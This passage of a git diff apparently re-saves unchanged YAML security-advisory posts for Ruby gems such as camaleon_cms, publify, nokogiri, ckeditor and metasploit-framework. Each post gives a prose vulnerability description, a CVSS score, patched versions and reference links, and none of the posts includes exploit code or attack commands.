+  title: Elastic APM agent for Ruby vulnerable to Improper Certificate Validation
+  date: 2022-05-24
+  description: |
+    A TLS certificate validation flaw was found in Elastic APM agent for
+    Ruby versions before 2.9.0. When specifying a trusted server CA certificate via
+    the `server_ca_cert` setting, the Ruby agent would not properly verify the certificate
+    returned by the APM server. This could result in a man in the middle style attack
+    against the Ruby agent.
+  cvss_v3: 7.4
+  patched_versions:
+  - ">= 2.9.0"
+  related:
+    url:
+    - https://www.elastic.co/community/security/
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2020-13353.md b/advisories/_posts/2022-05-24-CVE-2020-13353.md
index 3873a213..5b20afd3 100644
--- a/advisories/_posts/2022-05-24-CVE-2020-13353.md
+++ b/advisories/_posts/2022-05-24-CVE-2020-13353.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2020-13353 (gitaly): Gitaly Insufficient Session Expiration vulnerability'
-comments: false
-categories:
-- gitaly
-advisory:
-  gem: gitaly
-  cve: 2020-13353
-  ghsa: mmmm-chjf-jmvw
-  url: https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-13353.json
-  title: Gitaly Insufficient Session Expiration vulnerability
-  date: 2022-05-24
-  description: |
-    When importing repos via URL, one time use git credentials were persisted
-    beyond the expected time window in Gitaly 1.79.0 or above. Affected versions are:
-    >=1.79.0, <13.3.9,>=13.4, <13.4.5,>=13.5, <13.5.2.
-  cvss_v3: 3.2
-  unaffected_versions:
-  - "< 1.79.0"
-  patched_versions:
-  - "~> 13.3.9"
-  - "~> 13.4.5"
-  - ">= 13.5.2"
-  related:
-    url:
-    - https://gitlab.com/gitlab-org/gitaly/-/issues/2882
----
+---
+layout: advisory
+title: 'CVE-2020-13353 (gitaly): Gitaly Insufficient Session Expiration vulnerability'
+comments: false
+categories:
+- gitaly
+advisory:
+  gem: gitaly
+  cve: 2020-13353
+  ghsa: mmmm-chjf-jmvw
+  url: https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-13353.json
+  title: Gitaly Insufficient Session Expiration vulnerability
+  date: 2022-05-24
+  description: |
+    When importing repos via URL, one time use git credentials were persisted
+    beyond the expected time window in Gitaly 1.79.0 or above. Affected versions are:
+    >=1.79.0, <13.3.9,>=13.4, <13.4.5,>=13.5, <13.5.2.
+  cvss_v3: 3.2
+  unaffected_versions:
+  - "< 1.79.0"
+  patched_versions:
+  - "~> 13.3.9"
+  - "~> 13.4.5"
+  - ">= 13.5.2"
+  related:
+    url:
+    - https://gitlab.com/gitlab-org/gitaly/-/issues/2882
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2020-27193.md b/advisories/_posts/2022-05-24-CVE-2020-27193.md
index c7510ef1..813a788a 100644
--- a/advisories/_posts/2022-05-24-CVE-2020-27193.md
+++ b/advisories/_posts/2022-05-24-CVE-2020-27193.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2020-27193 (ckeditor): Improper Neutralization of Input During Web Page
-  Generation in CKEditor4'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2020-27193
-  ghsa: 4m44-5j2g-xf64
-  url: https://ckeditor.com/blog/CKEditor-4.15.1-with-a-security-patch-released/
-  title: Improper Neutralization of Input During Web Page Generation in CKEditor4
-  date: 2022-05-24
-  description: |
-    A cross-site scripting (XSS) vulnerability in the Color Dialog plugin
-    for CKEditor 4.15.0 allows remote attackers to run arbitrary web script after persuading
-    a user to copy and paste crafted HTML code into one of editor inputs.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-27193
-    - https://ckeditor.com/blog/CKEditor-4.15.1-with-a-security-patch-released/
-    - https://ckeditor.com/cke4/release/CKEditor-4.15.1
-    - https://ckeditor.com/ckeditor-4/download/
-    - https://www.oracle.com//security-alerts/cpujul2021.html
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://github.com/advisories/GHSA-4m44-5j2g-xf64
----
+---
+layout: advisory
+title: 'CVE-2020-27193 (ckeditor): Improper Neutralization of Input During Web Page
+  Generation in CKEditor4'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2020-27193
+  ghsa: 4m44-5j2g-xf64
+  url: https://ckeditor.com/blog/CKEditor-4.15.1-with-a-security-patch-released/
+  title: Improper Neutralization of Input During Web Page Generation in CKEditor4
+  date: 2022-05-24
+  description: |
+    A cross-site scripting (XSS) vulnerability in the Color Dialog plugin
+    for CKEditor 4.15.0 allows remote attackers to run arbitrary web script after persuading
+    a user to copy and paste crafted HTML code into one of editor inputs.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27193
+    - https://ckeditor.com/blog/CKEditor-4.15.1-with-a-security-patch-released/
+    - https://ckeditor.com/cke4/release/CKEditor-4.15.1
+    - https://ckeditor.com/ckeditor-4/download/
+    - https://www.oracle.com//security-alerts/cpujul2021.html
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://github.com/advisories/GHSA-4m44-5j2g-xf64
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2020-7385.md b/advisories/_posts/2022-05-24-CVE-2020-7385.md
index 33b5a492..7f74df41 100644
--- a/advisories/_posts/2022-05-24-CVE-2020-7385.md
+++ b/advisories/_posts/2022-05-24-CVE-2020-7385.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2020-7385 (metasploit-framework): Metasploit Framework user exposes Metasploit
-  to same deserialization issue that is exploited by that module'
-comments: false
-categories:
-- metasploit-framework
-advisory:
-  gem: metasploit-framework
-  cve: 2020-7385
-  ghsa: xgww-h98f-24qf
-  url: https://github.com/rapid7/metasploit-framework/pull/14300
-  title: Metasploit Framework user exposes Metasploit to same deserialization issue
-    that is exploited by that module
-  date: 2022-05-24
-  description: |
-    By launching the drb_remote_codeexec exploit, a Metasploit Framework
-    user will inadvertently expose Metasploit to the same deserialization issue that
-    is exploited by that module, due to the reliance on the vulnerable Distributed Ruby
-    class functions. Since Metasploit Framework typically runs with elevated privileges,
-    this can lead to a system compromise on the Metasploit workstation. Note that an
-    attacker would have to lie in wait and entice the Metasploit user to run the affected
-    module against a malicious endpoint in a "hack-back" type of attack. Metasploit
-    is only vulnerable when the drb_remote_codeexec module is running. In most cases,
-    this cannot happen automatically.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 4.19.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-7385
-    - https://github.com/rapid7/metasploit-framework/pull/14300
-    - https://github.com/rapid7/metasploit-framework/pull/14335
-    - https://help.rapid7.com/metasploit/release-notes/archive/2020/10/
-    - https://github.com/advisories/GHSA-xgww-h98f-24qf
----
+---
+layout: advisory
+title: 'CVE-2020-7385 (metasploit-framework): Metasploit Framework user exposes Metasploit
+  to same deserialization issue that is exploited by that module'
+comments: false
+categories:
+- metasploit-framework
+advisory:
+  gem: metasploit-framework
+  cve: 2020-7385
+  ghsa: xgww-h98f-24qf
+  url: https://github.com/rapid7/metasploit-framework/pull/14300
+  title: Metasploit Framework user exposes Metasploit to same deserialization issue
+    that is exploited by that module
+  date: 2022-05-24
+  description: |
+    By launching the drb_remote_codeexec exploit, a Metasploit Framework
+    user will inadvertently expose Metasploit to the same deserialization issue that
+    is exploited by that module, due to the reliance on the vulnerable Distributed Ruby
+    class functions. Since Metasploit Framework typically runs with elevated privileges,
+    this can lead to a system compromise on the Metasploit workstation. Note that an
+    attacker would have to lie in wait and entice the Metasploit user to run the affected
+    module against a malicious endpoint in a "hack-back" type of attack. Metasploit
+    is only vulnerable when the drb_remote_codeexec module is running. In most cases,
+    this cannot happen automatically.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 4.19.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7385
+    - https://github.com/rapid7/metasploit-framework/pull/14300
+    - https://github.com/rapid7/metasploit-framework/pull/14335
+    - https://help.rapid7.com/metasploit/release-notes/archive/2020/10/
+    - https://github.com/advisories/GHSA-xgww-h98f-24qf
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-25969.md b/advisories/_posts/2022-05-24-CVE-2021-25969.md
index 8e38b36a..4a4b6dd4 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-25969.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-25969.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2021-25969 (camaleon_cms): Camaleon CMS Stored Cross-site Scripting vulnerability'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2021-25969
-  ghsa: x78v-4fvj-rg9j
-  url: https://github.com/owen2345/camaleon-cms/commit/05506e9087bb05282c0bae6ccfe0283d0332ab3c
-  title: Camaleon CMS Stored Cross-site Scripting vulnerability
-  date: 2022-05-24
-  description: |
-    In “Camaleon CMS” application, versions 0.0.1 through 2.6.0 are vulnerable
-    to stored XSS, that allows unprivileged application users to store malicious scripts
-    in the comments section of the post. These scripts are executed in a victim’s browser
-    when they open the page containing the malicious comment.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 0.0.1"
-  patched_versions:
-  - ">= 2.6.0.1"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25969
----
+---
+layout: advisory
+title: 'CVE-2021-25969 (camaleon_cms): Camaleon CMS Stored Cross-site Scripting vulnerability'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2021-25969
+  ghsa: x78v-4fvj-rg9j
+  url: https://github.com/owen2345/camaleon-cms/commit/05506e9087bb05282c0bae6ccfe0283d0332ab3c
+  title: Camaleon CMS Stored Cross-site Scripting vulnerability
+  date: 2022-05-24
+  description: |
+    In “Camaleon CMS” application, versions 0.0.1 through 2.6.0 are vulnerable
+    to stored XSS, that allows unprivileged application users to store malicious scripts
+    in the comments section of the post. These scripts are executed in a victim’s browser
+    when they open the page containing the malicious comment.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 0.0.1"
+  patched_versions:
+  - ">= 2.6.0.1"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25969
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-25970.md b/advisories/_posts/2022-05-24-CVE-2021-25970.md
index 1267cd5a..94c6c7f3 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-25970.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-25970.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2021-25970 (camaleon_cms): Camaleon CMS Insufficient Session Expiration
-  vulnerability'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2021-25970
-  ghsa: 438x-2p9v-g8h9
-  url: https://github.com/owen2345/camaleon-cms/commit/77e31bc6cdde7c951fba104aebcd5ebb3f02b030
-  title: Camaleon CMS Insufficient Session Expiration vulnerability
-  date: 2022-05-24
-  description: |
-    Camaleon CMS 0.1.7 through 2.6.0 doesn’t terminate the active session
-    of the users, even after the admin changes the user’s password. A user that was
-    already logged in, will still have access to the application even after the password
-    was changed.
-  cvss_v3: 8.8
-  unaffected_versions:
-  - "< 0.1.7"
-  patched_versions:
-  - ">= 2.6.0.1"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25970
----
+---
+layout: advisory
+title: 'CVE-2021-25970 (camaleon_cms): Camaleon CMS Insufficient Session Expiration
+  vulnerability'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2021-25970
+  ghsa: 438x-2p9v-g8h9
+  url: https://github.com/owen2345/camaleon-cms/commit/77e31bc6cdde7c951fba104aebcd5ebb3f02b030
+  title: Camaleon CMS Insufficient Session Expiration vulnerability
+  date: 2022-05-24
+  description: |
+    Camaleon CMS 0.1.7 through 2.6.0 doesn’t terminate the active session
+    of the users, even after the admin changes the user’s password. A user that was
+    already logged in, will still have access to the application even after the password
+    was changed.
+  cvss_v3: 8.8
+  unaffected_versions:
+  - "< 0.1.7"
+  patched_versions:
+  - ">= 2.6.0.1"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25970
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-25971.md b/advisories/_posts/2022-05-24-CVE-2021-25971.md
index c086d409..2967b7cb 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-25971.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-25971.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2021-25971 (camaleon_cms): Camaleon CMS vulnerable to Uncaught Exception'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2021-25971
-  ghsa: r2w2-h6r8-3r53
-  url: https://github.com/owen2345/camaleon-cms/commit/ab89584ab32b98a0af3d711e3f508a1d048147d2
-  title: Camaleon CMS vulnerable to Uncaught Exception
-  date: 2022-05-24
-  description: |
-    In Camaleon CMS, versions 2.0.1 through 2.6.0 are vulnerable to an Uncaught
-    Exception. The app's media upload feature crashes permanently when an attacker with
-    a low privileged access uploads a specially crafted .svg file.
-  cvss_v3: 4.3
-  unaffected_versions:
-  - "< 2.0.1"
-  patched_versions:
-  - ">= 2.6.0.1"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25971
----
+---
+layout: advisory
+title: 'CVE-2021-25971 (camaleon_cms): Camaleon CMS vulnerable to Uncaught Exception'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2021-25971
+  ghsa: r2w2-h6r8-3r53
+  url: https://github.com/owen2345/camaleon-cms/commit/ab89584ab32b98a0af3d711e3f508a1d048147d2
+  title: Camaleon CMS vulnerable to Uncaught Exception
+  date: 2022-05-24
+  description: |
+    In Camaleon CMS, versions 2.0.1 through 2.6.0 are vulnerable to an Uncaught
+    Exception. The app's media upload feature crashes permanently when an attacker with
+    a low privileged access uploads a specially crafted .svg file.
+  cvss_v3: 4.3
+  unaffected_versions:
+  - "< 2.0.1"
+  patched_versions:
+  - ">= 2.6.0.1"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25971
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-25972.md b/advisories/_posts/2022-05-24-CVE-2021-25972.md
index efd5c290..185406d0 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-25972.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-25972.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2021-25972 (camaleon_cms): Camaleon CMS vulnerable to Server-Side Request
-  Forgery'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2021-25972
-  ghsa: vx6p-q4gj-x6xx
-  url: https://github.com/owen2345/camaleon-cms/commit/5a252d537411fdd0127714d66c1d76069dc7e190
-  title: Camaleon CMS vulnerable to Server-Side Request Forgery
-  date: 2022-05-24
-  description: |
-    In Camaleon CMS, versions 2.1.2.0 through 2.6.0, are vulnerable to Server-Side
-    Request Forgery (SSRF) in the media upload feature, which allows admin users to
-    fetch media files from external URLs but fails to validate URLs referencing to localhost
-    or other internal servers. This allows attackers to read files stored in the internal
-    server.
-  cvss_v3: 4.9
-  unaffected_versions:
-  - "< 2.1.2.0"
-  patched_versions:
-  - ">= 2.6.0.1"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25972
----
+---
+layout: advisory
+title: 'CVE-2021-25972 (camaleon_cms): Camaleon CMS vulnerable to Server-Side Request
+  Forgery'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2021-25972
+  ghsa: vx6p-q4gj-x6xx
+  url: https://github.com/owen2345/camaleon-cms/commit/5a252d537411fdd0127714d66c1d76069dc7e190
+  title: Camaleon CMS vulnerable to Server-Side Request Forgery
+  date: 2022-05-24
+  description: |
+    In Camaleon CMS, versions 2.1.2.0 through 2.6.0, are vulnerable to Server-Side
+    Request Forgery (SSRF) in the media upload feature, which allows admin users to
+    fetch media files from external URLs but fails to validate URLs referencing to localhost
+    or other internal servers. This allows attackers to read files stored in the internal
+    server.
+  cvss_v3: 4.9
+  unaffected_versions:
+  - "< 2.1.2.0"
+  patched_versions:
+  - ">= 2.6.0.1"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25972
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-25974.md b/advisories/_posts/2022-05-24-CVE-2021-25974.md
index 9dece7fe..55cd80ea 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-25974.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-25974.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2021-25974 (publify_core): Cross site scripting in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2021-25974
-  ghsa: wmh9-x28j-c6gr
-  url: https://github.com/publify/publify/commit/fefd5f76302adcc425b2b6e7e7d23587cfc0083e
-  title: Cross site scripting in publify
-  date: 2022-05-24
-  description: |
-    In Publify, versions v8.0 to v9.2.4 are vulnerable to stored XSS. A user
-    with a 'publisher' role is able to inject and execute arbitrary JavaScript code
-    while creating a page/article.
-  cvss_v3: 5.4
-  unaffected_versions:
-  - "< 8.0"
-  patched_versions:
-  - ">= 9.2.5"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25974
----
+---
+layout: advisory
+title: 'CVE-2021-25974 (publify_core): Cross site scripting in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2021-25974
+  ghsa: wmh9-x28j-c6gr
+  url: https://github.com/publify/publify/commit/fefd5f76302adcc425b2b6e7e7d23587cfc0083e
+  title: Cross site scripting in publify
+  date: 2022-05-24
+  description: |
+    In Publify, versions v8.0 to v9.2.4 are vulnerable to stored XSS. A user
+    with a 'publisher' role is able to inject and execute arbitrary JavaScript code
+    while creating a page/article.
+  cvss_v3: 5.4
+  unaffected_versions:
+  - "< 8.0"
+  patched_versions:
+  - ">= 9.2.5"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25974
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-25975.md b/advisories/_posts/2022-05-24-CVE-2021-25975.md
index d8b22004..d38de425 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-25975.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-25975.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2021-25975 (publify_core): Cross site scripting in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2021-25975
-  ghsa: 3h7v-wqw7-ff28
-  url: https://github.com/publify/publify/commit/d99c0870d3dbbfde7febdc6cad33199b84770101
-  title: Cross site scripting in publify
-  date: 2022-05-24
-  description: |
-    In publify, versions v8.0 to v9.2.4 are vulnerable to stored XSS as a
-    result of an unrestricted file upload. This issue allows a user with 'publisher'
-    role to inject malicious JavaScript via the uploaded html file.
-  cvss_v3: 5.4
-  unaffected_versions:
-  - "< 8.0"
-  patched_versions:
-  - ">= 9.2.5"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25974
----
+---
+layout: advisory
+title: 'CVE-2021-25975 (publify_core): Cross site scripting in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2021-25975
+  ghsa: 3h7v-wqw7-ff28
+  url: https://github.com/publify/publify/commit/d99c0870d3dbbfde7febdc6cad33199b84770101
+  title: Cross site scripting in publify
+  date: 2022-05-24
+  description: |
+    In publify, versions v8.0 to v9.2.4 are vulnerable to stored XSS as a
+    result of an unrestricted file upload. This issue allows a user with 'publisher'
+    role to inject malicious JavaScript via the uploaded html file.
+  cvss_v3: 5.4
+  unaffected_versions:
+  - "< 8.0"
+  patched_versions:
+  - ">= 9.2.5"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25974
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-3517.md b/advisories/_posts/2022-05-24-CVE-2021-3517.md
index ee43402d..c2392f58 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-3517.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-3517.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2021-3517 (nokogiri): Nokogiri contains libxml Out-of-bounds Write vulnerability'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2021-3517
-  ghsa: jw9f-hh49-cvp9
-  url: https://bugzilla.redhat.com/show_bug.cgi?id=1954232
-  title: Nokogiri contains libxml Out-of-bounds Write vulnerability
-  date: 2022-05-24
-  description: |
-    There is a flaw in the xml entity encoding functionality of libxml2 in versions before 2.9.11. An attacker who is able to supply a crafted file to be processed by an application linked with the affected functionality of libxml2 could trigger an out-of-bounds read. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
-
-    Nokogiri prior to version 1.11.4 used a vulnerable version of libxml2. Nokogiri 1.11.4 updated libxml2 to version 2.9.11 to address this and other vulnerabilities in libxml2.
-  cvss_v3: 8.6
-  patched_versions:
-  - ">= 1.11.4"
-  related:
-    url:
-    - https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E
-    - https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E
-    - https://lists.debian.org/debian-lts-announce/2021/05/msg00008.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZOMV5J4PMZAORVT64BKLV6YIZAFDGX6/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QVM4UJ3376I6ZVOYMHBNX4GY3NIV52WV/
-    - https://security.gentoo.org/glsa/202107-05
-    - https://security.netapp.com/advisory/ntap-20210625-0002/
-    - https://security.netapp.com/advisory/ntap-20211022-0004/
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://github.com/sparklemotion/nokogiri/issues/2233
-    - https://github.com/sparklemotion/nokogiri/issues/2274
-    - https://github.com/sparklemotion/nokogiri/blob/7c19ef5cc6b7c5c36827dd5495f857c6877ec8cf/CHANGELOG.md?plain=1#L579
-    - https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e
----
+---
+layout: advisory
+title: 'CVE-2021-3517 (nokogiri): Nokogiri contains libxml Out-of-bounds Write vulnerability'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2021-3517
+  ghsa: jw9f-hh49-cvp9
+  url: https://bugzilla.redhat.com/show_bug.cgi?id=1954232
+  title: Nokogiri contains libxml Out-of-bounds Write vulnerability
+  date: 2022-05-24
+  description: |
+    There is a flaw in the xml entity encoding functionality of libxml2 in versions before 2.9.11. An attacker who is able to supply a crafted file to be processed by an application linked with the affected functionality of libxml2 could trigger an out-of-bounds read. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
+
+    Nokogiri prior to version 1.11.4 used a vulnerable version of libxml2. Nokogiri 1.11.4 updated libxml2 to version 2.9.11 to address this and other vulnerabilities in libxml2.
+  cvss_v3: 8.6
+  patched_versions:
+  - ">= 1.11.4"
+  related:
+    url:
+    - https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E
+    - https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E
+    - https://lists.debian.org/debian-lts-announce/2021/05/msg00008.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZOMV5J4PMZAORVT64BKLV6YIZAFDGX6/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QVM4UJ3376I6ZVOYMHBNX4GY3NIV52WV/
+    - https://security.gentoo.org/glsa/202107-05
+    - https://security.netapp.com/advisory/ntap-20210625-0002/
+    - https://security.netapp.com/advisory/ntap-20211022-0004/
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://github.com/sparklemotion/nokogiri/issues/2233
+    - https://github.com/sparklemotion/nokogiri/issues/2274
+    - https://github.com/sparklemotion/nokogiri/blob/7c19ef5cc6b7c5c36827dd5495f857c6877ec8cf/CHANGELOG.md?plain=1#L579
+    - https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-3518.md b/advisories/_posts/2022-05-24-CVE-2021-3518.md
index 4749bb63..ce2722b6 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-3518.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-3518.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2021-3518 (nokogiri): Nokogiri Implements libxml2 version vulnerable to
-  use-after-free'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2021-3518
-  ghsa: v4f8-2847-rwm7
-  url: https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
-  title: Nokogiri Implements libxml2 version vulnerable to use-after-free
-  date: 2022-05-24
-  description: |
-    There's a flaw in libxml2 in versions before 2.9.11. An attacker
-    who is able to submit a crafted file to be processed by an application
-    linked with libxml2 could trigger a use-after-free. The greatest
-    impact from this flaw is to confidentiality, integrity, and availability.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 1.11.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-3518
-    - https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
-    - https://nokogiri.org/CHANGELOG.html#security_8
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1954242
-    - https://lists.debian.org/debian-lts-announce/2021/05/msg00008.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZOMV5J4PMZAORVT64BKLV6YIZAFDGX6/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QVM4UJ3376I6ZVOYMHBNX4GY3NIV52WV/
-    - https://security.gentoo.org/glsa/202107-05
-    - https://security.netapp.com/advisory/ntap-20210625-0002/
-    - https://github.com/sparklemotion/nokogiri/blob/2edbbef95f1dc12c1ddc5ebda71b9159026245fe/CHANGELOG.md?plain=1#L722
-    - https://github.com/advisories/GHSA-v4f8-2847-rwm7
----
+---
+layout: advisory
+title: 'CVE-2021-3518 (nokogiri): Nokogiri Implements libxml2 version vulnerable to
+  use-after-free'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2021-3518
+  ghsa: v4f8-2847-rwm7
+  url: https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
+  title: Nokogiri Implements libxml2 version vulnerable to use-after-free
+  date: 2022-05-24
+  description: |
+    There's a flaw in libxml2 in versions before 2.9.11. An attacker
+    who is able to submit a crafted file to be processed by an application
+    linked with libxml2 could trigger a use-after-free. The greatest
+    impact from this flaw is to confidentiality, integrity, and availability.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 1.11.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3518
+    - https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
+    - https://nokogiri.org/CHANGELOG.html#security_8
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1954242
+    - https://lists.debian.org/debian-lts-announce/2021/05/msg00008.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZOMV5J4PMZAORVT64BKLV6YIZAFDGX6/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QVM4UJ3376I6ZVOYMHBNX4GY3NIV52WV/
+    - https://security.gentoo.org/glsa/202107-05
+    - https://security.netapp.com/advisory/ntap-20210625-0002/
+    - https://github.com/sparklemotion/nokogiri/blob/2edbbef95f1dc12c1ddc5ebda71b9159026245fe/CHANGELOG.md?plain=1#L722
+    - https://github.com/advisories/GHSA-v4f8-2847-rwm7
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-3537.md b/advisories/_posts/2022-05-24-CVE-2021-3537.md
index bb198cc6..b9cc7767 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-3537.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-3537.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2021-3537 (nokogiri): Nokogiri Implements libxml2 version vulnerable to
-  null pointer dereferencing'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2021-3537
-  ghsa: 286v-pcf5-25rc
